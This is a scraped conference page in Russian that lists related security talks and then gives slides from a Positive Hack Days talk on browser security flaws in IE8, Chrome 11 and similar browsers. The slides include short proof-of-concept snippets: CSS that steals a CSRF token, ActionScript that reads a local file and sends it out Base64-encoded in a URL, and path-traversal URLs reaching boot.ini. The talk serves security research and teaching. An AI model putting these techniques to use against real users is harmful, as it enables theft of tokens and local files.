Positive Hack Days. Воронцов. Безопасность браузеров: новый взгляд (0-day)Positive Hack Days
Доклад посвящен вопросам безопасности клиентских приложений, используемых для работы в Интернете. Основной акцент сделан на исследовании механизмов кэширования и загрузки файлов в современных браузерах (IE8, IE9, Chrome, Opera, Safari, Firefox).
Приводятся схемы и примеры атак с использованием результатов исследования и уязвимостей браузеров, обнаруженных в результате подготовки материала. Рассматриваются атаки Cross Application Scripting, где браузер выступает как в роли приложения-отправителя, так и в роли целевого приложения.
Также рассматривается вопрос взаимодействия с файловой системой внешних плагинов браузеров, таких как Adobe Flash и Adobe Acrobat, и атаки, использующие этот вектор.
Оранжевый - новый синий: Как портировать Chrome Extension в Firefox Extensionchaykaborya
Доклад с 4front meetup #8.
Видео здесь: https://youtu.be/-i9nNmCCFpA
В докладе речь идет о том как портировать Chrome Extension в Firefox Extension или сразу написать кросс-браузерное расширение с нуля.
Семинар пройдет в формате мастер-класса. Слушатели получат как теоритические, так и практические знания.
В рамках мастер-класса будут рассмотрены уязвимости :
• Unrestricted File Upload
• Remote File Inclusion
• Local File Inclusion
Во время мастер-класса будут рассмотрены теоретические аспекты, вышеуказанных уязвимостей, приведены примеры уязвимого исходного кода.
Слушателям будут продемонстрированы примеры эксплуатации уязвимостей, техника обхода различных фильтраций.
Кроме того, будут приведены примеры безопасного написания сценариев.
Так же у каждого будет возможность применить полученные знания на практике.
Positive Hack Days. Баранов. DNS Rebinding возвращается (0-day)Positive Hack Days
Доклад посвящен известной несколько лет атаке под названием "DNS Rebinding" ("Anti-DNS Pinning"). Суть атаки состоит в возможности обойти ограничения "Same Origin Policy" во всех современных веб-браузерах и тем самым получить доступ к любым данным, обрабатываемым в уязвимом приложении. Несмотря на богатую историю, считается, что современные средства защиты блокируют атаку, и реализовать ее на практике почти невозможно.
В докладе будут продемонстрированы практические приемы использования метода Anti-DNS Pinning для атак на корпоративные сети, системы виртуализации и защищенные внешние ресурсы, представлен инструментарий для использования уязвимости. Будут приведены реальные сюжеты получения максимального доступа к любым целевым системам в крупных гетерогенных сетях, а также возможные варианты защиты.
Positive Hack Days. Воронцов. Безопасность браузеров: новый взгляд (0-day)Positive Hack Days
Доклад посвящен вопросам безопасности клиентских приложений, используемых для работы в Интернете. Основной акцент сделан на исследовании механизмов кэширования и загрузки файлов в современных браузерах (IE8, IE9, Chrome, Opera, Safari, Firefox).
Приводятся схемы и примеры атак с использованием результатов исследования и уязвимостей браузеров, обнаруженных в результате подготовки материала. Рассматриваются атаки Cross Application Scripting, где браузер выступает как в роли приложения-отправителя, так и в роли целевого приложения.
Также рассматривается вопрос взаимодействия с файловой системой внешних плагинов браузеров, таких как Adobe Flash и Adobe Acrobat, и атаки, использующие этот вектор.
Оранжевый - новый синий: Как портировать Chrome Extension в Firefox Extensionchaykaborya
Доклад с 4front meetup #8.
Видео здесь: https://youtu.be/-i9nNmCCFpA
В докладе речь идет о том как портировать Chrome Extension в Firefox Extension или сразу написать кросс-браузерное расширение с нуля.
Семинар пройдет в формате мастер-класса. Слушатели получат как теоритические, так и практические знания.
В рамках мастер-класса будут рассмотрены уязвимости :
• Unrestricted File Upload
• Remote File Inclusion
• Local File Inclusion
Во время мастер-класса будут рассмотрены теоретические аспекты, вышеуказанных уязвимостей, приведены примеры уязвимого исходного кода.
Слушателям будут продемонстрированы примеры эксплуатации уязвимостей, техника обхода различных фильтраций.
Кроме того, будут приведены примеры безопасного написания сценариев.
Так же у каждого будет возможность применить полученные знания на практике.
Positive Hack Days. Баранов. DNS Rebinding возвращается (0-day)Positive Hack Days
Доклад посвящен известной несколько лет атаке под названием "DNS Rebinding" ("Anti-DNS Pinning"). Суть атаки состоит в возможности обойти ограничения "Same Origin Policy" во всех современных веб-браузерах и тем самым получить доступ к любым данным, обрабатываемым в уязвимом приложении. Несмотря на богатую историю, считается, что современные средства защиты блокируют атаку, и реализовать ее на практике почти невозможно.
В докладе будут продемонстрированы практические приемы использования метода Anti-DNS Pinning для атак на корпоративные сети, системы виртуализации и защищенные внешние ресурсы, представлен инструментарий для использования уязвимости. Будут приведены реальные сюжеты получения максимального доступа к любым целевым системам в крупных гетерогенных сетях, а также возможные варианты защиты.
Безопасность сайта: мифы и реальность — Петр ВолковYandex
В поисковой выдаче Яндекса иногда можно встретить предупреждения о том, что сайт может быть небезопасен для компьютера или мобильного устройства пользователя. О том, что это значит, где найти вредоносный код и как его удалить, вы услышите из первых уст — от вирусного аналитика Яндекса.
Андрей Ковалев - Безопасность сайта: мифы и реальностьYandex
В поисковой выдаче Яндекса иногда можно встретить предупреждения о том, что сайт может быть небезопасен для компьютера или мобильного устройства пользователя. О том, что это значит, где найти вредоносный код и как его удалить, вы услышите из первых уст — от вирусного аналитика Яндекса.
Как защитить свой сайт, Пётр Волков, лекция в Школе вебмастеровYandex
Лекция Петра Волкова в Школе вебмастеров: «Как защитить свой сайт».
https://academy.yandex.ru/events/webmasters_school/yawebm2015/
Актуальные типы угроз и динамика их развития
Компрометация сервера и её последствия. Распределённые атаки типа «отказ в обслуживании». Подмена или добавление рекламы на стороне клиента. Атаки, направленные на пользователей. Проблемы, связанные со внешним содержимым.
Управление рисками безопасности веб-сайтов
Разные типы сайтов подвержены разным типам рисков информационной безопасности. Понимание целей и подходов злоумылшенников как ключ к эффективному снижению рисков. Методы монетизации атак на сайты.
Доступный инструментарий и методики для обеспечения безопасности
Открытые инструменты форензики для типовых и сложных проектов. Системы обнаружения вторжений, подходы к проектированию безопасности в архитектуре и процессах.
Опенсорс-инструменты на страже безопасности бэкенда — Петр ВолковYandex
Антивирусная система Яндекса ежедневно обнаруживает тысячи взломанных сайтов. Периодически среди них встречаются крупные и известные интернет-ресурсы.
Администраторы сайтов часто оказываются не готовы к тому, что злоумышленник может пробраться через внешний периметр и исполнить произвольный код на стороне сервера. В результате перед ними встаёт нелегкая задача: обнаружить последствия и предотвратить дальнейшие проблемы.
Доклад посвящён практикам и инструментам, которые могут существенно повысить эффективность противодействия вредоносной активности, и профилактике её возникновения.
Безопасность сайта: мифы и реальность — Петр ВолковYandex
В поисковой выдаче Яндекса иногда можно встретить предупреждения о том, что сайт может быть небезопасен для компьютера или мобильного устройства пользователя. О том, что это значит, где найти вредоносный код и как его удалить, вы услышите из первых уст — от вирусного аналитика Яндекса.
Андрей Ковалев - Безопасность сайта: мифы и реальностьYandex
В поисковой выдаче Яндекса иногда можно встретить предупреждения о том, что сайт может быть небезопасен для компьютера или мобильного устройства пользователя. О том, что это значит, где найти вредоносный код и как его удалить, вы услышите из первых уст — от вирусного аналитика Яндекса.
Как защитить свой сайт, Пётр Волков, лекция в Школе вебмастеровYandex
Лекция Петра Волкова в Школе вебмастеров: «Как защитить свой сайт».
https://academy.yandex.ru/events/webmasters_school/yawebm2015/
Актуальные типы угроз и динамика их развития
Компрометация сервера и её последствия. Распределённые атаки типа «отказ в обслуживании». Подмена или добавление рекламы на стороне клиента. Атаки, направленные на пользователей. Проблемы, связанные со внешним содержимым.
Управление рисками безопасности веб-сайтов
Разные типы сайтов подвержены разным типам рисков информационной безопасности. Понимание целей и подходов злоумылшенников как ключ к эффективному снижению рисков. Методы монетизации атак на сайты.
Доступный инструментарий и методики для обеспечения безопасности
Открытые инструменты форензики для типовых и сложных проектов. Системы обнаружения вторжений, подходы к проектированию безопасности в архитектуре и процессах.
Опенсорс-инструменты на страже безопасности бэкенда — Петр ВолковYandex
Антивирусная система Яндекса ежедневно обнаруживает тысячи взломанных сайтов. Периодически среди них встречаются крупные и известные интернет-ресурсы.
Администраторы сайтов часто оказываются не готовы к тому, что злоумышленник может пробраться через внешний периметр и исполнить произвольный код на стороне сервера. В результате перед ними встаёт нелегкая задача: обнаружить последствия и предотвратить дальнейшие проблемы.
Доклад посвящён практикам и инструментам, которые могут существенно повысить эффективность противодействия вредоносной активности, и профилактике её возникновения.
Как построить систему ИБ в кризис; 3 способа снижения затрат на ИБInfoWatch
1. Оценка рисков как способ снижения затрат на ИБ: как оценить и минимизировать риски
2. Оргмеры для снижения затрат, какие оргмеры работают и когда
3. Какие технические средства могут помочь повысить эффективность
Static Analysis: The Art of Fighting without FightingRob Ragan
Presentation that contrasts static and dynamic analysis of web applications for security vulnerabilities. Describes a technique to combine static and dynamic analysis called hybrid analysis. (SummerCon 2008)
InfoWatch Attack Killerрешение проблемы всех направленных атакInfoWatch
InfoWatch предлагает решение для обнаружения и защиты от многовекторных таргетированных атак, состоящее из 4 технологий, каждая из которых зарекомендовала свое качество на рынке информационной безопасности.
Today security filters can be found on our network perimeter, on our servers, in our frameworks and applications. As our network perimeter becomes more secure, applications become more of a target. Security filters such as IDS and WAF are relied upon to protect applications. Intrusion detection evasion techniques were pioneered over a decade ago. How are today's filters withstanding ever evolving evasion tactics? The presentation will examine how evasion techniques worked in the past and provide insight into how these techniques can still work today; with a focus on HTTP attacks. A practical new way to bypass Snort will be demonstrated. A tool to test other IDS for the vulnerability in Snort will be demonstrated. (Outerz0ne 2009)
Video of this presentation at Outerz0ne 5:
http://www.irongeek.com/i.php?page=videos/rob-ragan-filter-evasion-houdini-on-the-wire
Анализ защищенности Web-приложений, выявление уязвимостей в реальных условияхDmitry Evteev
Уязвимости и атаки на Web-приложения, общепринятые классификации уязвимостей. Ошибки, допускаемые разработчиками при создании клиентской и серверной частей Web-приложения, их возможные последствия и методы выявления и устранения. Примеры из практики. Обзор специализированных средств защиты Web-приложений: Web Application Firewall (WAF). Стоит ли полагаться на WAF?
Методология выявления уязвимостей в Web-приложениях, в частности, с использованием различных средств автоматического анализа.
General Waf detection and bypassing techniques. Main focus to demonstrate that how to take right approach to analyse the behaviour of web application firewall and then create test cases to bypass the same.
Нестандартные сценарии при проведении тестов на проникновение.
Пара не слишком-то и нестандартных случаев из практики. Показательно с точки зрения распространённости таких ошибок.
Спасибо Руслану Сабитову за предоставленную презентацию по аналогичной теме. Иначе было бы сложно сделать её в день доклада =)
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...Ontico
HighLoad++ 2017
Зал «Мумбай», 7 ноября, 14:00
Тезисы:
http://www.highload.ru/2017/abstracts/2900.html
Уязвимости Cross-Site Request Forgery (CSRF) являются "классикой" AppSec и хорошо известны как специалистам по безопасности, так и разработчикам веб-приложений. Сегодня, как правило, при разработке веб-приложений уделяется внимание защите от CSRF-атак, и реализуются механизмы защиты. Также относительно новая технология "SameSite cookie", должна еще больше обезопасить веб-приложения от CSRF. На текущий момент CSRF находится на 8 месте в списке OWASP Top-10, в то время как они находились на 5 месте до 2013 года. Означает ли это, что CSRF-уязвимости стали менее актуальными и "уходят в прошлое"?
...
Устройство фреймворка symfony 2 (http://frontend-dev.ru)Александр Егурцов
Презентация к вебинару об устройстве фреймворка symfony 2.
Видеозапись вебинара находится в моём блоге по адресу http://frontend-dev.ru/2012/12/12/symfony2-основы
Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...Ontico
РИТ++ 2017, секция ML + IoT + ИБ
Зал Белу-Оризонти, 5 июня, 13:00
Тезисы:
http://ritfest.ru/2017/abstracts/2798.html
В данном докладе будет рассмотрено множество вопросов, с которыми сталкивается AppSec-отдел - как генерировать анти-CSRF токены, где хранить секретные ключи, как тестировать безопасность в сжатые сроки и многое, многое другое.
Waf.js: как защищать веб-приложения с использованием JavaScriptPositive Hack Days
Ведущие: Денис Колегов и Арсений Реутов
Авторы доклада продемонстрируют, как внедрение клиентских сценариев JavaScript может быть использовано для обнаружения и предотвращения различных атак, поиска уязвимых клиентских компонент, определения утечек данных об инфраструктуре веб-приложений, выявления веб-ботов и инструментальных средств нападения. Поделятся собственными методами обнаружения инъекций при помощи синтаксических анализаторов без сигнатур и фильтрующих регулярных выражений, а также рассмотрят реализацию концепции JavaScript-ловушек на стороне клиента для атак SSRF, IDOR, Command Injection и CSRF.
Портирование C++ приложений на FLASCC: опыт Unreal Engine 3. Павел Наказненко...Unigine Corp.
Павел Наказненко, разработчик, freelance (Красноярск)
На основе нашего опыта портирования Unreal Engine 3 и Free Heroes 2 на Flash, расскажу немного о технологии FLASCC, а также тонкостях портирования С++ игр с помощью нее.
2. Google browser security handbook
Наиболее полное описание
уязвимостей и механизмов
безопасности, применяющихся в
браузерах.
Рассмотрим часть 2, главу "Life outside
same-origin rules" раздел "Privacy-related
side channels".
http://code.google.com/p/browsersec/wiki/Part2
3. Google browser security handbook
Reading back CSS :visited class on
links
Full-body CSS theft (Chris Evans
03/09/2010)
Resource inclusion probes with onload
and onerror checks.
Image size fingerprinting
Cache timing
General resource timing (Chris Evans
11/12/2009)
4. Reading back CSS :visited class
on links (J.Ruderman at 2010)
Для посещенных ссылок автоматически
меняется цвет.
В любом HTML документе, цвет ссылки можно
прочитать через .getComputedStyle или .
currentStyle (cross-domain).
Если цвет ссылки поменялся, то
злоумышленник делает вывод, что в истории
жертвы есть целевая страница.
Перебирая адреса страниц, злоумышленник
получает историю посещений жертвы.
5. Full-body CSS theft (Chris Evans
2010, only IE8)
Браузеры воспринимают HTML как CSS, который
можно подключить через <STYLE>
В HTML могут быть конфиденциальные данные
(например, CSRF токен)
Конф. данные можно получить благодаря гибкому
CSS парсеру, встроенному в браузер.
<style>
@import url("http://twitter.com/scarybeaststest");
</style>
var borrowed = document.body.currentStyle.fontFamily;
var i = borrowed.indexOf("authenticity_token = '");
borrowed = borrowed.substring(i + 22);
6. Resource inclusion probes with
onload and onerror checks
Браузеры вызывают события onload/onerror в
зависимости от HTTP статуса загрузки документа
При загрузке страниц с других доменов в тэгах:
<SCRIPT> <APPLET> <IMG> <OBJECT> <EMBED>
<IFRAME> <FRAME> отправляется запрос с
аутентификационными данными (COKIES)
Веб-приложения часто имеют страницы, HTTP
статус которых зависит от авторизации
пользователя (HTTP 3xx, HTTP 4xx)
Злоумышленник проверяет текущий статус
авторизации жертвы на целевом домене с любой
страницы.
7. Image size finderprinting
Браузеры автоматически присваивают реальные
размеры загруженному на страницу изображению
При загрузке картинок с других доменов в тэге
<IMG> отправляется запрос с
аутентификационными данными (COKIES)
Веб-приложения часто имеют динамические
картинки, высота и ширина которых зависит от
статуса авторизации пользователя (или др. прав)
Злоумышленник проверяет текущий статус
авторизации жертвы на целевом домене с любой
страницы.
8. Cache timing
После посещения страницы, она копируется в кэш
браузера - локальные данные ПК
Если страница находится к кэше, ее загрузка
осуществляется существенно быстрее
(пропорционально размеру страницы)
Злоумышленник может проверить наличие
страницы в кэше браузера жертвы зная время ее
загрузки (IFRAME -> onload event)
9. General resource timing (Chris
Evans 11/12/2009)
Часто размер динамической страницы веб-
приложения зависит от статуса авторизации
пользователя
Если пользователь авторизован, время загрузки
страницы будет отличаться от случая, когда
пользователь не авторизован
Злоумышленник может проверить статус
авторизации жертвы зная время ее загрузки
(IFRAME -> onload event)
10. Новое в Image size finderprinting.
Internet Explorer 8, 9, 10 (platform preview)
поддерживают свойство fileSize для объектов image
(<img>) и document, что позволяет получить размер
картинки в байтах
fileSize позволяет сильно улучшить зону покрытия
метода
Метод можно использовать не только для проверки
авторизации, но и для проверки наличия локальных
файлов картинок при открытии HTML в зоне file://
11. Механизмы загрузки файлов в
браузерах
Можно ли загрузить произвольный файл на диск
без согласия пользователя?
Можно ли предугадать путь к загруженному файлу?
12. Механизмы кэширования в
браузерах
Рассмотрим как кэш браузера храниться на диске
(файлы, SQLite).
В каких случаях кэшированные страницы можно
использовать как локальные HTML из того же
браузера
13. Cache finderprinting (Chrome)
Требует локального HTML с кодом PoС
Используем размеры картинок как сигнатуры
для распознавания сайтов в кэше.
Можно определить размер кэша с точностью N,
где N - среднее количество файлов кэша, на
которое приходиться одна картинка
14. Cache finderprinting (Chrome)
Почему работает метод?
Кэш храниться в виде раздельных локальных
файлов
Возможен доступ к файлам с кэшем из
браузера
Имена кэш-файлов предугадываемые
(нумерованные)
Image size finderprinting
На проверяемом сайте есть картинка
уникальных размеров или их
последовательность:
В примере:
Youtube: 113x392,
Google: 284x189 && 167x253
15. Local files access (HTML)
Можно ли получить содержимое локальных
файлов через .innerHTML?
Как проверить наличие произвольного
локального файла с ФС?
16. Local files access (SWF)
Файл должен быть собран с опцией (Flex)
--use-network=false
Плагин должен быть открыт в зоне file://
private function getData(name:String):void{
var url:URLRequest=new URLRequest(name);
var loader:URLLoader=new URLLoader();
loader.addEventListener(Event.COMPLETE,populate);
loader.load(url); }
private function sendData(host:String,data:String):void{
var enc:Base64Encoder=new Base64Encoder();
enc.encode(data);
data=enc.toString();
navigateToURL(new URLRequest("file:///"+host+"/"+data),"_self");
} http://www.andlabs.org/whitepapers/F_IE_PrisonBreak.pdf
http://xs-sniper.com/blog/2011/01/04/bypassing-flash%
E2%80%99s-local-with-filesystem-sandbox/
17. Local files access (SWF)
http://www.andlabs.org/whitepapers/F_IE_PrisonBreak.pdf
http://xs-sniper.com/blog/2011/01/04/bypassing-flash%
E2%80%99s-local-with-filesystem-sandbox/
18. Local files access (PDF)
Adobe 908
Adobe 925
We will begin our investigation
based on that information.
In the meantime, we ask that
you do not publicly disclose
this potential issue, in order to
protect Adobe's customers.
This has been assigned the
Adobe tracking number 908.
19. Pri-1
Area-Internals
SecSeverity-
From http:// to file:// (Chrome) Medium
Type-Security
Mstone-11
Issue 72492 (Feb 9, 2011)
Из командой строки (.lnk файлов) URL вида http:
//google.com/../../../../../../../../../../boot.ini ведет на C:
/boot.ini
Из ссылок в приложениях (GTalk,ICQ,Skype) надо
обойти встроенную нормализацию:
http://www.google.ru?q=OMFG../#a/../../../../../../../../../../..
/boot.ini
Можно вызвать через PDF документ
расположенный в зоне http://:
app.launchURL("http://../../../../../../../boot.ini",true)
20. Pri-1
Area-Internals
SecSeverity-
From http:// to file:// (Chrome) Medium
Type-Security
Mstone-11
21. Атака из топора (stealing local file
from remote in Chrome
11.0.696.68)
22. Атака из топора (stealing local file
from remote in Chrome
11.0.696.68)
23. Что нас ждет? GUI уязвимости
URL spoofing
PKI spoofing
Action spoofing
Dialogs bypass